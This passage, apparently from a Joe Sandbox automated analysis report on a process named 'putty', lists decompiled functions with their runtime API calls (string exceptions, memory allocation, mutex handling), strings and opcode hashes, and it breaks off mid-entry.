_memmove.LIBCMT ref: 00321DA0

Strings

invalid string position, xrefs: 00321CF1
string too long, xrefs: 00321D07, 00321D25

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throw_memmovestd::exception::exception
String ID: invalid string position$string too long
API String ID: 1253240057-4289949731
Opcode ID: c9ec6a79aeba8cea46abb0e35d4366cdf8fd2a7c3d8b0a7f3e4cd1e9790fed59
Instruction ID: 60ea958869979d2232ce5502ce46d6fd51550f35fd9e6d8645ce5ba5eb6c5597
Opcode Fuzzy Hash: c9ec6a79aeba8cea46abb0e35d4366cdf8fd2a7c3d8b0a7f3e4cd1e9790fed59
Instruction Fuzzy Hash: 1231D532314624DB8726DF1DF980CBEF3AAEFE5710311462EF452CB6A4DB70A80587A0

Function 00321A20 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00321A39

Part of subcall function 003B79B5: std::exception::exception.LIBCMT ref: 003B79CA
Part of subcall function 003B79B5: __CxxThrowException@8.LIBCMT ref: 003B79DF

std::_Xinvalid_argument.LIBCPMT ref: 00321A5A
std::_Xinvalid_argument.LIBCPMT ref: 00321A78
_memmove.LIBCMT ref: 00321AEF

Strings

invalid string position, xrefs: 00321A34
string too long, xrefs: 00321A55, 00321A73

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throw_memmovestd::exception::exception
String ID: invalid string position$string too long
API String ID: 1253240057-4289949731
Opcode ID: 3a562a954522c49e7e531a2f51a9bc10f812d5ee122089cf120678a393e1f180
Instruction ID: ad3dc3a276a8c0a8bc1b7fb93038e6b67476255029f3f99b377fcad7dbbc0665
Opcode Fuzzy Hash: 3a562a954522c49e7e531a2f51a9bc10f812d5ee122089cf120678a393e1f180
Instruction Fuzzy Hash: 4F31D1327152248B8726DF6DF98096AB3EAFFE4720311462EF552CB651EB70E845C7A0

Function 00326CC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00326CD6

Part of subcall function 003B79B5: std::exception::exception.LIBCMT ref: 003B79CA
Part of subcall function 003B79B5: __CxxThrowException@8.LIBCMT ref: 003B79DF

std::_Xinvalid_argument.LIBCPMT ref: 00326CEC
std::_Xinvalid_argument.LIBCPMT ref: 00326D07
_memmove.LIBCMT ref: 00326D72

Strings

invalid string position, xrefs: 00326CD1
string too long, xrefs: 00326CE7, 00326D02

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throw_memmovestd::exception::exception
String ID: invalid string position$string too long
API String ID: 1253240057-4289949731
Opcode ID: c51a095e10c6c17d1901125e08fd5f2ef8f2c0efd460332edeb9a0e8c651b015
Instruction ID: 424693f00d50126ddb52bf56c38cb21ccbc53d15c3dd789e573a5e4847c85e4c
Opcode Fuzzy Hash: c51a095e10c6c17d1901125e08fd5f2ef8f2c0efd460332edeb9a0e8c651b015
Instruction Fuzzy Hash: 6331B4323142245FD7269A1CFC82AAEF3A9EF91720B100A2EF591DB791CB609C4087A4

Function 003295C0 Relevance: 10.6, APIs: 7, Instructions: 68COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 003295E6

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

std::exception::exception.LIBCMT ref: 0032960D
__CxxThrowException@8.LIBCMT ref: 0032962C
std::exception::exception.LIBCMT ref: 0032964E
__CxxThrowException@8.LIBCMT ref: 0032966D
std::exception::exception.LIBCMT ref: 0032968A
__CxxThrowException@8.LIBCMT ref: 003296A9

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
String ID:
API String ID: 4237746311-0
Opcode ID: 6ce0dbd38fd45d39bdfa5d449d8ca85a9c9df1f3f92884c01a7cdc00628a5dd0
Instruction ID: 0ce434e3f11b1c92e4af9c8e607a15f6f0b471307cc0652216f81d5db1dbd843
Opcode Fuzzy Hash: 6ce0dbd38fd45d39bdfa5d449d8ca85a9c9df1f3f92884c01a7cdc00628a5dd0
Instruction Fuzzy Hash: ED2192B24183415BC306DF59C805B9FB7E8AFC4718F048A1EF295671C1D7748509CBA7

Function 00344500 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 00344518
_fprintf.LIBCMT ref: 0034452E
ExitProcess.KERNEL32 ref: 0034454B

Strings

libpng error: %s, xrefs: 0034450A
undefined, xrefs: 00344504, 00344509
\-@, xrefs: 00344543

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _fprintf$ExitProcess
String ID: \-@$libpng error: %s$undefined
API String ID: 1791400697-918491432
Opcode ID: 02eb8c9189b7067d52d27c5dfe16b29463fcbd7aecca5987093f1d3e8d1b8a85
Instruction ID: d71b16cd50e8cab36d43e11ccfe739dd61cff0c7eaae52b45e22bdd43b23ba91
Opcode Fuzzy Hash: 02eb8c9189b7067d52d27c5dfe16b29463fcbd7aecca5987093f1d3e8d1b8a85
Instruction Fuzzy Hash: 04E080D2E4160263FA5376B36C43FA7555C4F10745F050021FB01DE681FF8AEA440172

Function 00325F60 Relevance: 9.1, APIs: 6, Instructions: 91synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,D747BB9A,?,?,?,\-@), ref: 00325F9E
ReleaseMutex.KERNEL32(?,?,?,?,\-@), ref: 00325FB1
CloseHandle.KERNEL32(?,?,?,?,\-@), ref: 00325FCC
CloseHandle.KERNEL32(?,?,?,?,\-@), ref: 00325FD9
CloseHandle.KERNEL32(?,?,?,?,\-@), ref: 00325FE6
CloseHandle.KERNEL32(?,?,?,?,\-@), ref: 00325FF3

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: CloseHandle$MutexObjectReleaseSingleWait
String ID:
API String ID: 4138468388-0
Opcode ID: b299cc71f5bd5e88c2903118d9281f56821881e8f005e6e9447aafef87890d86
Instruction ID: 17f0006ac1b98ff8b33339938d3cab1c083feb11cd3852347afa2fb8078d367e
Opcode Fuzzy Hash: b299cc71f5bd5e88c2903118d9281f56821881e8f005e6e9447aafef87890d86
Instruction Fuzzy Hash: 3B314FB1A0475AEBCB01DFA9D980A9AFBB8FF08314B504A2AE514D7B40C775E954CFD0

Function 003266A0 Relevance: 9.1, APIs: 6, Instructions: 68synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 003266B5
ReleaseMutex.KERNEL32(?), ref: 003266CA
WaitForSingleObject.KERNEL32(?,000000FF), ref: 003266DA
ReleaseMutex.KERNEL32(?), ref: 003266F2
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00326702
Sleep.KERNEL32(00000064), ref: 00326718

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ObjectSingleWait$MutexRelease$Sleep
String ID:
API String ID: 3817808499-0
Opcode ID: 895415d5ec9bee3ac6197a6114704cf07419adee97d332dde031270c633d0198
Instruction ID: 2b2dd40d7c667b04dd9ab7abce300ce1f327c7f9ecfea3af86c1ab69904f0067
Opcode Fuzzy Hash: 895415d5ec9bee3ac6197a6114704cf07419adee97d332dde031270c633d0198
Instruction Fuzzy Hash: FA11E336301315578B24DFBABC81967B3ACEF85774725075EE556872E0CA71EC018750

Function 0032A9E0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 298COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32(00000001,?,?,?,00000104,003ECB58,00000001,D747BB9A), ref: 0032AAAA
MultiByteToWideChar.KERNEL32(00000001), ref: 0032AAB6

Strings

;, xrefs: 0032AC96

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ApisByteCharFileMultiWide
String ID: ;
API String ID: 1960412823-1661535913
Opcode ID: a6e1ac4defdbea879c031123316b10ef6ddc6dd44ee4c57e391b6be7414b167b
Instruction ID: eaae9acb5127666f1691e3bcc5cba89976dc5d0ff1ecc16db31689151feabac5
Opcode Fuzzy Hash: a6e1ac4defdbea879c031123316b10ef6ddc6dd44ee4c57e391b6be7414b167b
Instruction Fuzzy Hash: DEB1E8306106259FDB16DF14EC99BEA73B7FF85700F1046A9E0068B660DB70AE85CB92

Function 003C70A8 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 003C70B4

Part of subcall function 003C0CCC: __getptd_noexit.LIBCMT ref: 003C0CCF
Part of subcall function 003C0CCC: __amsg_exit.LIBCMT ref: 003C0CDC

__amsg_exit.LIBCMT ref: 003C70D4
__lock.LIBCMT ref: 003C70E4
InterlockedDecrement.KERNEL32(?), ref: 003C7101
_free.LIBCMT ref: 003C7114
InterlockedIncrement.KERNEL32(028E17F0), ref: 003C712C

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 87b36f7b997d0309e19af2cf1dbaae24feaa49977e5273ba665666adde326f85
Instruction ID: 1514c7d6e64839c60558404583f5f74bed34b9beb8b1872475239a8419cea321
Opcode Fuzzy Hash: 87b36f7b997d0309e19af2cf1dbaae24feaa49977e5273ba665666adde326f85
Instruction Fuzzy Hash: 4E015E32D096219BD723AB689806F5D77A0BF00721F19842DEC40EB691DB749D41DFD5

Function 00347390 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 003473E6
_memset.LIBCMT ref: 00347411
_malloc.LIBCMT ref: 0034744B
__floor_pentium4.LIBCMT ref: 003474CB

Strings

Out of Memory, xrefs: 003473FB

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _malloc$__floor_pentium4_memset
String ID: Out of Memory
API String ID: 1541659442-774281260
Opcode ID: 0af9fcee051eb03e4278d8724edd1b8d74c4c0d98c388c6b7de9328b5baa7ff3
Instruction ID: b5b9a101453f46e9ac335c75105af5d076d228c6768c2b966f1a72ed0fa69be8
Opcode Fuzzy Hash: 0af9fcee051eb03e4278d8724edd1b8d74c4c0d98c388c6b7de9328b5baa7ff3
Instruction Fuzzy Hash: BD513531E042168BDB129F6AD8807BEBBF9EF44304F114039DD95EB790EB34A941C790

Function 003471C0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00347228
_memset.LIBCMT ref: 00347253
_malloc.LIBCMT ref: 00347296
__floor_pentium4.LIBCMT ref: 0034731F

Strings

Out of Memory, xrefs: 0034723D

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _malloc$__floor_pentium4_memset
String ID: Out of Memory
API String ID: 1541659442-774281260
Opcode ID: f57cff89fd73f4a49fb94d6648ef11a7580a64b66e3b75c24f3e0aca51fb5f5e
Instruction ID: abdf4e0905e174efc860d204e562ab2227953c2fd63a193806efc66333666a86
Opcode Fuzzy Hash: f57cff89fd73f4a49fb94d6648ef11a7580a64b66e3b75c24f3e0aca51fb5f5e
Instruction Fuzzy Hash: D7512471E0861ADBDB029FA8D9417FEB7F9FF84300F054525EC55AB240D7B4AA50CBA1

Function 00321780 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0032179A

Part of subcall function 003B79B5: std::exception::exception.LIBCMT ref: 003B79CA
Part of subcall function 003B79B5: __CxxThrowException@8.LIBCMT ref: 003B79DF

std::_Xinvalid_argument.LIBCPMT ref: 003217DA

Part of subcall function 003B7968: std::exception::exception.LIBCMT ref: 003B797D
Part of subcall function 003B7968: __CxxThrowException@8.LIBCMT ref: 003B7992

_memmove.LIBCMT ref: 00321846

Strings

invalid string position, xrefs: 00321795
string too long, xrefs: 003217D5

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$_memmove
String ID: invalid string position$string too long
API String ID: 3836225697-4289949731
Opcode ID: d61862b1134f0cc57413b10e88bc68be6bee47b68fa5d47db426de7a853e10c9
Instruction ID: 644f32a837adccf7ee1fbc457222222b1b247e33be297308078dfb74b548c824
Opcode Fuzzy Hash: d61862b1134f0cc57413b10e88bc68be6bee47b68fa5d47db426de7a853e10c9
Instruction Fuzzy Hash: 9331AF327142249B8712DE5DF9C096EF3AAEFF5764721062FF115CB250DB71AC0187A5

Function 00322C30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00322C4A

Part of subcall function 003B79B5: std::exception::exception.LIBCMT ref: 003B79CA
Part of subcall function 003B79B5: __CxxThrowException@8.LIBCMT ref: 003B79DF

std::_Xinvalid_argument.LIBCPMT ref: 00322C87

Part of subcall function 003B7968: std::exception::exception.LIBCMT ref: 003B797D
Part of subcall function 003B7968: __CxxThrowException@8.LIBCMT ref: 003B7992

_memmove.LIBCMT ref: 00322CE8

Strings

invalid string position, xrefs: 00322C45
string too long, xrefs: 00322C82

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$_memmove
String ID: invalid string position$string too long
API String ID: 3836225697-4289949731
Opcode ID: 3960de242a88e7221c625ce8543412c23c9f647588a2242adccb6ce302c37135
Instruction ID: 1f3bd4eb73bc9bce8344e144a417ef42758c8a556a7d03886fb12bee206441af
Opcode Fuzzy Hash: 3960de242a88e7221c625ce8543412c23c9f647588a2242adccb6ce302c37135
Instruction Fuzzy Hash: 88318432304234ABD7229E5CFC80A6FF799EBA1765B21062FF551CB391CB61DC4183A5

Function 00322430 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85fileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(D747BB9A), ref: 00322450
